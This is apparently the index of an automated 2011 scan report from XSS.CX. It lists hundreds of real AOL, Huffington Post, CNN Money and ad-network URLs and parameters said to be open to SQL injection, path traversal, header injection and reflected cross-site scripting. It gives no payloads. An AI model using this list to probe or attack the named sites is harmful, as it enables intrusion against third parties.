Report generated by XSS.CX at Thu May 05 15:44:47 CDT 2011.


XSS, Cross Site Scripting in aol http systems, CWE-79, CAPEC-86, DORK, GHDB

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]

1.2. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

1.3. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [limit parameter]

1.4. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [name of an arbitrarily supplied request parameter]

1.5. http://aol.sportingnews.com/services/sn-promos/yearbooks.php [name of an arbitrarily supplied request parameter]

1.6. http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css [REST URL parameter 2]

1.7. http://o.aolcdn.com/os/fonts/helvetica_lt_77_bold_condensed-webfont.woff [REST URL parameter 3]

1.8. http://o.aolcdn.com/os/mobile-desktop/js/mobileblog.js [REST URL parameter 2]

1.9. http://o.aolcdn.com/os/realestate/favicon.ico [REST URL parameter 2]

1.10. http://o.aolcdn.com/os_merge/ [file parameter]

1.11. http://widgets.digg.com/buttons/count [url parameter]

1.12. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

1.13. http://www.huffingtonpost.com/threeup.php [v parameter]

2. File path traversal

2.1. http://o.aolcdn.com/art/merge [f parameter]

2.2. http://o.aolcdn.com/art/merge/ [f parameter]

3. LDAP injection

4. HTTP header injection

4.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

4.2. http://ad.doubleclick.net/getcamphist [src parameter]

4.3. http://api.screenname.aol.com/auth/login [devId parameter]

4.4. http://api.screenname.aol.com/auth/login [f parameter]

4.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

4.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

4.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

4.8. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 2]

4.9. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 3]

4.10. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 4]

4.11. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 5]

4.12. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 6]

4.13. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 7]

4.14. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 2]

4.15. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 3]

4.16. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 4]

4.17. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 5]

4.18. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 6]

4.19. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 7]

4.20. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 2]

4.21. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 3]

4.22. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 4]

4.23. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 5]

4.24. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 6]

4.25. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 7]

4.26. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 2]

4.27. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 3]

4.28. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 4]

4.29. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 5]

4.30. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 6]

4.31. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 7]

4.32. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 2]

4.33. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 3]

4.34. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 4]

4.35. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 5]

4.36. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 6]

4.37. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 7]

4.38. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 2]

4.39. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 3]

4.40. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 4]

4.41. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 5]

4.42. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 6]

4.43. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 7]

4.44. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 8]

4.45. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 2]

4.46. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 3]

4.47. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 4]

4.48. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 5]

4.49. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 6]

4.50. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 7]

4.51. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 2]

4.52. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 3]

4.53. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 4]

4.54. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 5]

4.55. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 6]

4.56. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 7]

4.57. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 2]

4.58. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 3]

4.59. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 4]

4.60. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 5]

4.61. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 6]

4.62. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 7]

4.63. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 2]

4.64. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 3]

4.65. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 4]

4.66. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 5]

4.67. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 6]

4.68. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 7]

4.69. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 8]

4.70. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 2]

4.71. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 3]

4.72. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 4]

4.73. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 5]

4.74. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 6]

4.75. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 7]

4.76. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

4.77. http://search.aol.com/aol/tracking [name of an arbitrarily supplied request parameter]

4.78. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

4.79. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

5. Cross-site scripting (reflected)

5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

5.10. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]

5.11. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 2]

5.12. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]

5.13. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 2]

5.14. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1]

5.15. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 2]

5.16. https://account.login.aol.com/_cqr/opr/opr.psp [authLev parameter]

5.17. https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter]

5.18. http://ad.doubleclick.net/adj/huffpost.premium/front [name of an arbitrarily supplied request parameter]

5.19. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

5.20. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

5.21. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

5.22. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpt parameter]

5.23. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpvc parameter]

5.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [name of an arbitrarily supplied request parameter]

5.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpt parameter]

5.26. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpvc parameter]

5.27. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [name of an arbitrarily supplied request parameter]

5.28. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]

5.29. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [body-class parameter]

5.30. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [name of an arbitrarily supplied request parameter]

5.31. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

5.32. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

5.33. http://apartments.rentedspaces.oodle.com/ [name of an arbitrarily supplied request parameter]

5.34. http://apartments.rentedspaces.oodle.com/ [post_redirect parameter]

5.35. http://api.screenname.aol.com/auth/getToken [c parameter]

5.36. https://api.screenname.aol.com/auth/getToken [c parameter]

5.37. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]

5.38. http://apps.conduit.com/TechCrunch_App-Techcrunch_News [REST URL parameter 1]

5.39. http://ar.voicefive.com/b/rc.pli [func parameter]

5.40. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

5.41. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

5.42. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

5.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

5.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

5.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

5.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

5.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

5.48. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

5.49. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.50. http://b.scorecardresearch.com/beacon.js [c10 parameter]

5.51. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.52. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.53. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.54. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.55. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.56. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.57. http://bid.openx.net/json [c parameter]

5.58. http://c.aol.com/read/get_topics [callback parameter]

5.59. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpt parameter]

5.60. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpvc parameter]

5.61. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpck parameter]

5.62. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpvc parameter]

5.63. http://choices.truste.com/ca [c parameter]

5.64. http://choices.truste.com/ca [h parameter]

5.65. http://choices.truste.com/ca [iplc parameter]

5.66. http://choices.truste.com/ca [ox parameter]

5.67. http://choices.truste.com/ca [plc parameter]

5.68. http://choices.truste.com/ca [w parameter]

5.69. http://choices.truste.com/ca [zi parameter]

5.70. http://coverage.mqcdn.com/coverage [REST URL parameter 1]

5.71. http://coverage.mqcdn.com/coverage [cat parameter]

5.72. http://coverage.mqcdn.com/coverage [jsonp parameter]

5.73. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

5.74. http://d.tradex.openx.com/afr.php [cb parameter]

5.75. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

5.76. http://d.tradex.openx.com/afr.php [zoneid parameter]

5.77. http://dev.aol.com/ [name of an arbitrarily supplied request parameter]

5.78. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 1]

5.79. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 2]

5.80. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 3]

5.81. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 4]

5.82. http://digg.com/submit [REST URL parameter 1]

5.83. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 1]

5.84. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 2]

5.85. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 1]

5.86. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 2]

5.87. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 1]

5.88. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 2]

5.89. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]

5.90. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]

5.91. http://help.aol.com/help/microsites/search.do [name of an arbitrarily supplied request parameter]

5.92. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

5.93. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

5.94. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter]

5.95. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter]

5.96. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter]

5.97. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter]

5.98. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter]

5.99. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter]

5.100. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter]

5.101. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter]

5.102. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter]

5.103. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter]

5.104. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter]

5.105. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter]

5.106. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2]

5.107. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2]

5.108. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 3]

5.109. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2]

5.110. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2]

5.111. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 3]

5.112. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2]

5.113. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2]

5.114. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 3]

5.115. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2]

5.116. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2]

5.117. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 3]

5.118. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2]

5.119. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2]

5.120. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 3]

5.121. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2]

5.122. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2]

5.123. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 3]

5.124. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2]

5.125. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2]

5.126. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 3]

5.127. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2]

5.128. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2]

5.129. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 3]

5.130. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2]

5.131. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2]

5.132. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 3]

5.133. http://music.aol.com/radioguide/bb [REST URL parameter 2]

5.134. http://music.aol.com/radioguide/bb [REST URL parameter 2]

5.135. http://my.screenname.aol.com/_cqr/login/checkStatus.psp [cb parameter]

5.136. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

5.137. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

5.138. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

5.139. https://my.screenname.aol.com/_cqr/login/login.psp [createSn parameter]

5.140. https://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

5.141. https://my.screenname.aol.com/_cqr/login/login.psp [offerId parameter]

5.142. https://my.screenname.aol.com/_cqr/login/login.psp [siteState parameter]

5.143. https://my.screenname.aol.com/_cqr/login/login.psp [uitype parameter]

5.144. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [authLev parameter]

5.145. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [brandless parameter]

5.146. https://my.screenname.aol.com/badbrowser.psp [authLev parameter]

5.147. https://my.screenname.aol.com/badbrowser.psp [authLev parameter]

5.148. https://my.screenname.aol.com/badbrowser.psp [offerId parameter]

5.149. https://my.screenname.aol.com/badbrowser.psp [offerId parameter]

5.150. https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter]

5.151. https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter]

5.152. http://o.aolcdn.com/smartbox/SBG/REST/ [callback parameter]

5.153. http://pglb.buzzfed.com/10032/f4f3ccafe3fc01872a82127ebf3deddd [callback parameter]

5.154. http://portal.pf.aol.com/jsonmfus/ws [callback parameter]

5.155. http://portal.pf.aol.com/jsonqpus/ws [callback parameter]

5.156. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/ [name of an arbitrarily supplied request parameter]

5.157. http://realestate.aol.com/blog/rental-listings [REST URL parameter 2]

5.158. http://search.twitter.com/search [q parameter]

5.159. http://sportingnews.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

5.160. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.161. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

5.162. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.163. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.164. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.165. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.166. http://view.c3metrics.com/v.js [cid parameter]

5.167. http://view.c3metrics.com/v.js [id parameter]

5.168. http://view.c3metrics.com/v.js [t parameter]

5.169. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]

5.170. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]

5.171. http://www.citysbest.com/ [icid parameter]

5.172. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]

5.173. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.174. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.175. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]

5.176. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]

5.177. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]

5.178. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]

5.179. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]

5.180. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]

5.181. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]

5.182. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]

5.183. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]

5.184. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

5.185. http://www.huffingtonpost.com/ [icid parameter]

5.186. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

5.187. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]

5.188. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]

5.189. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]

5.190. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]

5.191. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]

5.192. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]

5.193. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]

5.194. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]

5.195. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

5.196. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

5.197. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

5.198. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

5.199. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]

5.200. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]

5.201. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]

5.202. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

5.203. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

5.204. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

5.205. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

5.206. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

5.207. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

5.208. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

5.209. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

5.210. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]

5.211. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

5.212. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

5.213. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

5.214. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]

5.215. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]

5.216. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]

5.217. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]

5.218. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.219. http://aol.com/ [name of an arbitrarily supplied request parameter]

5.220. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

5.221. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

5.222. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.223. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

5.224. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

5.225. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

5.226. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

5.227. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

5.228. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

5.229. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.230. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

5.231. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.232. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

5.233. http://developer.aol.com/ [name of an arbitrarily supplied request parameter]

5.234. http://engadget.com/ [name of an arbitrarily supplied request parameter]

5.235. http://jsyk.com/ [name of an arbitrarily supplied request parameter]

5.236. http://mmafighting.com/traffic/ [bv parameter]

